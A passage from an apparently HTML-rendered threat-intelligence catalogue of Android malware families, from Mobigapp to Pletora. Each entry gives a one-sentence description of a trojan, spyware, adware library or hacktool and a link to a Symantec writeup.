<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-0435-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-0435-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobigapp"><a class="anchor" href="#_mobigapp"></a><a class="link" href="#_mobigapp">Mobigapp</a></h3>
<div class="paragraph">
<p>Mobigapp is a Trojan horse for Android devices that downloads applications disguised as system updates.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 265. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-062520-5802-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-062520-5802-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobilebackup"><a class="anchor" href="#_mobilebackup"></a><a class="link" href="#_mobilebackup">MobileBackup</a></h3>
<div class="paragraph">
<p>MobileBackup is a spyware application for Android devices that monitors the affected device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 266. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-0040-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-0040-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobilespy"><a class="anchor" href="#_mobilespy"></a><a class="link" href="#_mobilespy">Mobilespy</a></h3>
<div class="paragraph">
<p>Mobilespy is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 267. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-071512-0653-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-071512-0653-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobiletx"><a class="anchor" href="#_mobiletx"></a><a class="link" href="#_mobiletx">Mobiletx</a></h3>
<div class="paragraph">
<p>Mobiletx is a Trojan horse for Android devices that steals information from the compromised device. It may also send SMS messages to a premium-rate number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 268. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-052807-4439-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-052807-4439-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobinaspy"><a class="anchor" href="#_mobinaspy"></a><a class="link" href="#_mobinaspy">Mobinaspy</a></h3>
<div class="paragraph">
<p>Mobinaspy is a spyware application for Android devices that can track the device&#8217;s location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 269. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-0511-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-0511-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobus"><a class="anchor" href="#_mobus"></a><a class="link" href="#_mobus">Mobus</a></h3>
<div class="paragraph">
<p>Mobus is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 270. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2006-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2006-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobwin"><a class="anchor" href="#_mobwin"></a><a class="link" href="#_mobwin">MobWin</a></h3>
<div class="paragraph">
<p>MobWin is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 271. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1522-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1522-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mocore"><a class="anchor" href="#_mocore"></a><a class="link" href="#_mocore">Mocore</a></h3>
<div class="paragraph">
<p>Mocore is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 272. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-092112-4603-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-092112-4603-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moghava"><a class="anchor" href="#_moghava"></a><a class="link" href="#_moghava">Moghava</a></h3>
<div class="paragraph">
<p>Moghava is a Trojan horse for Android devices that modifies images that are stored on the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 273. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-022712-2822-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-022712-2822-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_momark"><a class="anchor" href="#_momark"></a><a class="link" href="#_momark">Momark</a></h3>
<div class="paragraph">
<p>Momark is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 274. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-5529-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-5529-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_monitorello"><a class="anchor" href="#_monitorello"></a><a class="link" href="#_monitorello">Monitorello</a></h3>
<div class="paragraph">
<p>Monitorello is a spyware application for Android devices that allows the device it is installed on to be monitored.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 275. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-4737-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-4737-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moolah"><a class="anchor" href="#_moolah"></a><a class="link" href="#_moolah">Moolah</a></h3>
<div class="paragraph">
<p>Moolah is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 276. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1007-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1007-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mopub"><a class="anchor" href="#_mopub"></a><a class="link" href="#_mopub">MoPub</a></h3>
<div class="paragraph">
<p>MoPub is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 277. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-2456-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-2456-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_morepaks"><a class="anchor" href="#_morepaks"></a><a class="link" href="#_morepaks">Morepaks</a></h3>
<div class="paragraph">
<p>Morepaks is a Trojan horse for Android devices that downloads remote files and may display advertisements on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 278. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-071204-1130-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-071204-1130-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nandrobox"><a class="anchor" href="#_nandrobox"></a><a class="link" href="#_nandrobox">Nandrobox</a></h3>
<div class="paragraph">
<p>Nandrobox is a Trojan horse for Android devices that steals information from the compromised device. It also deletes certain SMS messages from the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 279. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-070212-2132-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-070212-2132-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netisend"><a class="anchor" href="#_netisend"></a><a class="link" href="#_netisend">Netisend</a></h3>
<div class="paragraph">
<p>Netisend is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 280. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-080207-1139-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-080207-1139-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nickispy"><a class="anchor" href="#_nickispy"></a><a class="link" href="#_nickispy">Nickispy</a></h3>
<div class="paragraph">
<p>Nickispy is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 281. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-072714-3613-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-072714-3613-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_notcompatible"><a class="anchor" href="#_notcompatible"></a><a class="link" href="#_notcompatible">Notcompatible</a></h3>
<div class="paragraph">
<p>Notcompatible is a Trojan horse for Android devices that acts as a proxy.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 282. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-050307-2712-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-050307-2712-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nuhaz"><a class="anchor" href="#_nuhaz"></a><a class="link" href="#_nuhaz">Nuhaz</a></h3>
<div class="paragraph">
<p>Nuhaz is a Trojan horse for Android devices that may intercept text messages on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 283. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-3416-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-3416-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nyearleaker"><a class="anchor" href="#_nyearleaker"></a><a class="link" href="#_nyearleaker">Nyearleaker</a></h3>
<div class="paragraph">
<p>Nyearleaker is a Trojan horse program for Android devices that steals information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 284. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-010514-0844-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-010514-0844-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obad"><a class="anchor" href="#_obad"></a><a class="link" href="#_obad">Obad</a></h3>
<div class="paragraph">
<p>Obad is a Trojan horse for Android devices that opens a back door, steals information, and downloads files. It also sends SMS messages to premium-rate numbers and spreads malware to Bluetooth-enabled devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 285. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-060411-4146-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-060411-4146-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_oneclickfraud"><a class="anchor" href="#_oneclickfraud"></a><a class="link" href="#_oneclickfraud">Oneclickfraud</a></h3>
<div class="paragraph">
<p>Oneclickfraud is a Trojan horse for Android devices that attempts to coerce a user into paying for a pornographic service.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 286. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-011205-4412-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-011205-4412-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_opfake"><a class="anchor" href="#_opfake"></a><a class="link" href="#_opfake">Opfake</a></h3>
<div class="paragraph">
<p>Opfake is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 287. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-2732-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-2732-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_opfake_b"><a class="anchor" href="#_opfake_b"></a><a class="link" href="#_opfake_b">Opfake.B</a></h3>
<div class="paragraph">
<p>Opfake.B is a Trojan horse for the Android platform that may receive commands from a remote attacker to perform various functions.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 288. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-022406-1309-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-022406-1309-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ozotshielder"><a class="anchor" href="#_ozotshielder"></a><a class="link" href="#_ozotshielder">Ozotshielder</a></h3>
<div class="paragraph">
<p>Ozotshielder is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 289. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-091505-3230-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-091505-3230-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pafloat"><a class="anchor" href="#_pafloat"></a><a class="link" href="#_pafloat">Pafloat</a></h3>
<div class="paragraph">
<p>Pafloat is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 290. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-2015-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-2015-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pandaads"><a class="anchor" href="#_pandaads"></a><a class="link" href="#_pandaads">PandaAds</a></h3>
<div class="paragraph">
<p>PandaAds is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 291. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1959-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1959-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pandbot"><a class="anchor" href="#_pandbot"></a><a class="link" href="#_pandbot">Pandbot</a></h3>
<div class="paragraph">
<p>Pandbot is a Trojan horse for Android devices that may download more files onto the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 292. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-071215-1454-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-071215-1454-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pdaspy"><a class="anchor" href="#_pdaspy"></a><a class="link" href="#_pdaspy">Pdaspy</a></h3>
<div class="paragraph">
<p>Pdaspy is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 293. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-0749-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-0749-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_penetho"><a class="anchor" href="#_penetho"></a><a class="link" href="#_penetho">Penetho</a></h3>
<div class="paragraph">
<p>Penetho is a hacktool for Android devices that can be used to crack the WiFi password of the router that the device is using.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 294. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-100110-3614-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-100110-3614-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_perkel"><a class="anchor" href="#_perkel"></a><a class="link" href="#_perkel">Perkel</a></h3>
<div class="paragraph">
<p>Perkel is a Trojan horse for Android devices that may steal information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 295. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-082811-4213-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-082811-4213-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_phimdropper"><a class="anchor" href="#_phimdropper"></a><a class="link" href="#_phimdropper">Phimdropper</a></h3>
<div class="paragraph">
<p>Phimdropper is a Trojan horse for Android devices that sends and intercepts incoming SMS messages.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 296. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-021002-2943-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-021002-2943-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_phospy"><a class="anchor" href="#_phospy"></a><a class="link" href="#_phospy">Phospy</a></h3>
<div class="paragraph">
<p>Phospy is a Trojan horse for Android devices that steals confidential information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 297. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-060706-4803-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-060706-4803-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_piddialer"><a class="anchor" href="#_piddialer"></a><a class="link" href="#_piddialer">Piddialer</a></h3>
<div class="paragraph">
<p>Piddialer is a Trojan horse for Android devices that dials premium-rate numbers from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 298. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-111020-2247-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-111020-2247-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pikspam"><a class="anchor" href="#_pikspam"></a><a class="link" href="#_pikspam">Pikspam</a></h3>
<div class="paragraph">
<p>Pikspam is a Trojan horse for Android devices that sends spam SMS messages from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 299. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-121815-0336-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-121815-0336-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pincer"><a class="anchor" href="#_pincer"></a><a class="link" href="#_pincer">Pincer</a></h3>
<div class="paragraph">
<p>Pincer is a Trojan horse for Android devices that steals confidential information and opens a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 300. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-052307-3530-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-052307-3530-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pirator"><a class="anchor" href="#_pirator"></a><a class="link" href="#_pirator">Pirator</a></h3>
<div class="paragraph">
<p>Pirator is a Trojan horse on the Android platform that downloads files and steals potentially confidential information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 301. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-021609-5740-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-021609-5740-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pjapps"><a class="anchor" href="#_pjapps"></a><a class="link" href="#_pjapps">Pjapps</a></h3>
<div class="paragraph">
<p>Pjapps is a Trojan horse that has been embedded on third party applications and opens a back door on the compromised device. It retrieves commands from a remote command and control server.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 302. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-022303-3344-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-022303-3344-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pjapps_b"><a class="anchor" href="#_pjapps_b"></a><a class="link" href="#_pjapps_b">Pjapps.B</a></h3>
<div class="paragraph">
<p>Pjapps.B is a Trojan horse for Android devices that opens a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 303. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032014-1624-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032014-1624-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pletora"><a class="anchor" href="#_pletora"></a><a class="link" href="#_pletora">Pletora</a></h3>
<div class="paragraph">
<p>Pletora is a is a Trojan horse for Android devices that may lock the compromised device. It then asks the user to pay in order to unlock the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 304. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-061217-4345-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-061217-4345-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
